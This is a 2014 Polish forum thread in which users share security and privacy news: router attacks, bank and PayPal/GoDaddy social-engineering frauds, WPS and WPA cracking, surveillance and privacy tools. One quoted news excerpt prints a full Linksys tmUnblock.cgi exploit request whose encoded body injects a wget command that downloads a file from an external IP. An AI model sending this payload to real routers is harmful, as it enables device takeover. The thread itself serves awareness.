Forum CDRinfo.pl

Forum CDRinfo.pl (https://forum.cdrinfo.pl/)
-   Komputery - oprogramowanie i sprzęt (https://forum.cdrinfo.pl/f113/)
-   -   Takie tam o bezpieczeństwie i prywatności (https://forum.cdrinfo.pl/f113/takie-tam-o-bezpieczenstwie-prywatnosci-93117/)

gallus 01.03.2014 12:00

Ja trafiłem na razie podmienione dns-y tylko u jednego ze znajomych, całe szczęście orange się zorientowało i blokowało ruch po podmianie.

chris996 01.03.2014 01:26

Ku przestrodze:

Stracił 16 000 PLN bo miał dziurawy router.
Prawie 1,2 miliona Polaków może być podatnych na ten atak!

andy 22.02.2014 14:14

Cytat:

W dniu 30 stycznia 2014 r. Sąd Apelacyjny we Wrocławiu (sygn. akt I ACa 1452/13) rozstrzygnął prawomocnie ten istotny spór ***8211; oddalając apelację powoda i w efekcie przyznając słuszność administratorowi portalu.
Cytat:

Spór toczył się przez blisko 3 lata. Sporne, czarno-białe zdjęcia (zrobione w szkole podstawowej, ponad 30 lat temu) zostały zamieszczone w portalu przez byłych uczniów klasy, do której uczęszczał również powód. Jedno ze zdjęć zostało opatrzone podpisem, w którym inny użytkownik portalu wskazał imiona i nazwiska niektórych uwiecznionych na nim osób.
Powód dochodząc usunięcia swojego wizerunku z portalu powoływał się na ochronę wynikającą z prawa autorskiego, z regulacji dotyczących danych osobowych oraz wreszcie na przepisy dotyczące dóbr osobistych.
Cytat:

Czekając na pisemne uzasadnienie orzeczenia Sadu Apelacyjnego, jako podsumowanie można przytoczyć słowa Sądu Okręgowego we Wrocławiu, który orzekając w I instancji stwierdził ***8211; ***8222;Mówiąc potocznie, nic złego się nie stało i stać się nie mogło***8221;.
http://www.olesinski.com/spor-o-publ...ie-zakonczony/

--

Cytat:

Polska występuje na liście 21 krajów, w których zlokalizowano serwery odbierające ruch z inwigilowanych komputerów. Występujemy w zaszczytnym gronie krajów takich jak Kolumbia, Panama, Oman, Arabia Saudyjska, Zjednoczone Emiraty Arabskie, Egipt, Etiopia, Maroko, Sudan, Nigeria, Kazachstan, Azerbejdżan, Malezja, Tajlandia, Uzbekistan, Włochy, Węgry, Meksyk i Korea Południowa.
http://zaufanatrzeciastrona.pl/post/...cego-obywateli


Cytat:

Na czym polega atak

Odkryto, że nie dość, że jeden z parametrów skryptu obsługującego blokowanie i odblokowywanie stron dostępnych za pomocą rutera jest podatny na wstrzyknięcie dowolnego polecenia powłoki, to na dokładkę wykonanie tego skryptu odbywa się bez weryfikacji uprawnień użytkownika.
Przykładowy atak wygląda tak:
POST /tmUnblock.cgi HTTP/1.1 Host: 192.168.0.1:8080 User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.0.1:8080/ Authorization: Basic YWRtaW46JmkxKkBVJDZ4dmNH Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 518 %73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d&%63%68% 61%6e%67%65%5f%61%63 %74%69%6f%6e%3d&%73%75%62%6d%69%74%5f%74%79%70%65% 3d&%61%63%74%69%6f %6e%3d&%63%6f%6d%6d%69%74%3d%30&%74%74%63%70%5f%6e %75%6d%3d%32&%74%74 %63%70%5f%73%69%7a%65%3d%32&%74%74%63%70%5f%69%70% 3d%2d%68%20%60%63 %64%20%2f%74%6d%70%3b%69%66%20%5b%20%21%20%2d%65%2 0%2e%4c%32%36%20 %5d%3b%74%68%65%6e%20%77%67%65%74%20%68%74%74%70%3 a%2f%2f%xx%xx%2e %xx%xx%xx%2e%xx%xx%xx%2e%xx%xx%xx%3a%31%39%33%2f%3 0%52%78%2e%6d%69 %64%3b%66%69%60&%53%74%61%72%74%45%50%49%3d%31 Autoryzacja co prawda jest wymagana, jednak hasło podane przez użytkownika nie jest weryfikowane.
http://zaufanatrzeciastrona.pl/post/...terow-linksysa

sobrus 13.02.2014 19:01

Było już na forum, ale w tym temacie nie.
Jeżeli komuś zależy na odrobinie prywatności w internecie.
To jest fajny dodatek do przeglądarek:

Ghostery

Jak się okazuje nie ma już praktycznie stron bez zamontowanego tropiciela ....
Większość ma po kilka.

andy 04.02.2014 00:13

Dodatkowo należy dodać, że jak ktoś ma słaby główny klucz to też złamanie tego nie jest trudne :) Wystarczy przechwycić hendszejka i kilka dni zabawy ze słownikiem (mam ok 14mln słów :D) + brute force na krótkie frazy, łatwe frazy :)

chris996 03.02.2014 23:53

Temat o bezpieczeństwie to dorzucę coś od siebie. Info przydatne dla osób co szyfrują sieć WIFI.
Jakiś czas temu przed świętami bawiłem się w hakowanie własnej sieci WIFI (szyfrowanie WPA2) i trafiłem na taki artykuł:
Reaver ***8211; program do hackowania Wi-Fi WPA/WPA2 (poprzez dziurę w WPS)

Tak jak napisano w artykule, dzięki programowi Reaver możliwe jest uzyskanie kluczy WPA/WPA2, jeśli ruter ma włączony WPS.
U mnie w TP-LINK mam QSS.
Cóż, nawet taką sieć WIFI z WPA2, można z łatwością złamać i szyfrowanie WPA2 w takim przypadku nic nie daje :P

Berion 03.02.2014 21:33

Problem znika w przypadku dodatkowych źródeł entropii.

andy 03.02.2014 20:08

Ciekawe czy to jest rzeczywistością...
http://sekurak.pl/trojan-w-tranzysto...a-szyfrowanie/

Cytat:

Międzynarodowy zespół naukowców opracował bardzo interesującą i potencjalnie niezwykle skuteczną metodę wprowadzania złośliwych funkcji do komputerowych układów elektronicznych. Pomysł nie polega tu jednak na stosunkowo łatwym do wykrycia przeprojektowaniu samego układu, lecz na wprowadzeniu zmian w strukturze i zachowaniu samych tranzystorów!

Patrix 03.02.2014 19:52

Cytat:

Napisany przez andy (Post 1274586)

to też mnie przekonało do przejścia na dd-wrt (hw dlink) ;)

sobrus 03.02.2014 11:54

Hmm, co prawda nie mam tego routera, ale mam popularnego i taniego Sagema od orange.
Wyglada na to, że lepiej będzie zapytania DNS rozwiązywać na serwerze proxy (za dwoma firewallami) niż pytać router.

ed hunter 03.02.2014 09:54

Nihil novi sub sole. :]

andy 02.02.2014 23:19

Cytat:

Jak złodzieje zrobili przelew w mBanku bez kodu z SMS-a?

Bystry czytelnik mógł to już wywnioskować z zrzutu ekranu powyżej. W przypadku mBanku przestępcy nie mieli możliwości wykorzystania błędu logicznego, który pojawia się w niektórych bankach ***8212; musieli więc skorzystać z socjotechniki, aby przekonać ofiarę do samodzielnego zdefiniowania w ramach jej konta nowego ***8220;zaufanego odbiorcy przelewu***8220;. Odbiorca taki charakteryzuje się tym, że wysyłane na jego rachunek przelewy nie muszą być potwierdzane jednorazowym kodem z SMS-a.
Ofierze sprzedali historię, że procedura ta ma na celu dodanie nowego formatu numeru rachunku bankowego do jej konta, wymaganego ze względu na niedawne i głośne w mediach połączenie mBanku z Multibankiem (piękna zagrywka!) ***8230;i ofiara na to poszła. Krótko mówiąc: ofiara przepisała podstawiony przez atakujących numer konta, dostała SMS-a z kodem i wpisała go na fałszywej stronie mBanku (w tym czasie atakujący, którzy byli zalogowani na faktyczne konto ofiary, równolegle odtwarzali rzeczy wpisywane przez ofiarę informacje, łącznei z kodem z SMSa)
http://niebezpiecznik.pl/post/straci...h-na-ten-atak/

andy 30.01.2014 12:25

Bezpieczeństwo i Apple


--

Cytat:

Atakujący wykonał telefon do PayPala, i podszywając się pod pracownika udało mu się uzyskać 4 ostatnie cyfry numeru karty kredytowej Naoki. Ujawnił też, jak się przed tym zabezpieczyć: wystarczy zadzwonić do PayPala i poprosić, aby przy naszym koncie odnotowano ***8220;nie udzielać informacji przez telefon***8220;.
Mając 4 ostatnie cyfry numeru karty kredytowej zadzwonił do GoDaddy i powiedział, że zgubił kartę, ale pamięta jej ostatnie 4 cyfry. Wszystko wskazuje na to, że obsługa techniczna potrzebowała jeszcze 2 pierwszych cyfr numeru karty, ale ***8230;pozwoliła atakującemu na ich zgadywanie (!!!). Udało się to ponoć za pierwszym podejściem ***8212; co zresztą nie jest bardzo zaskakujące, jeśli ktoś wie, że numer karty kredytowej podlega ścisłej regulacji ISO, i wszystkie karty płatnicze zaczynają się głównie od 4 lub 5, a potem następuje (także znany) identyfikator banku. Wiedząc jakie banki są w danym kraju***8230;
http://niebezpiecznik.pl/post/jak-pr...-znajac-hasla/

andy 24.01.2014 23:39

Nieświadomi użytkownicy przesyłają swoje dokumentu do galerii szablonów :)

http://antyweb.pl/prywatne-dokumenty...-google-drive/


Boshe... CV, podania o premie...

andy 20.01.2014 23:28



Cytat:

This project:

  • Detects IMSI based device location tracking
  • Provides counter measures for device tracking
  • Can provide swarm-wise-decision-based cellular service interruption
  • Can provide secure wifi/wimax alternative data routes through MESH-like networking
  • Detect and prevent remote hidden application installation
  • Detect and prevent remote hidden SMS-based SIM attacks
  • Prevent or spoof GPS data
  • Does NOT secure any data transmissions
  • Does NOT prevent already installed rogue application from full access

https://github.com/SecUpwN/Android-I...tcher-Detector


Wszystkie czasy w strefie CET. Aktualna godzina: 20:37.

Powered by vBulletin® Version 3.9.0 LTS
Copyright ©2000 - 2026, vBulletin Solutions Inc.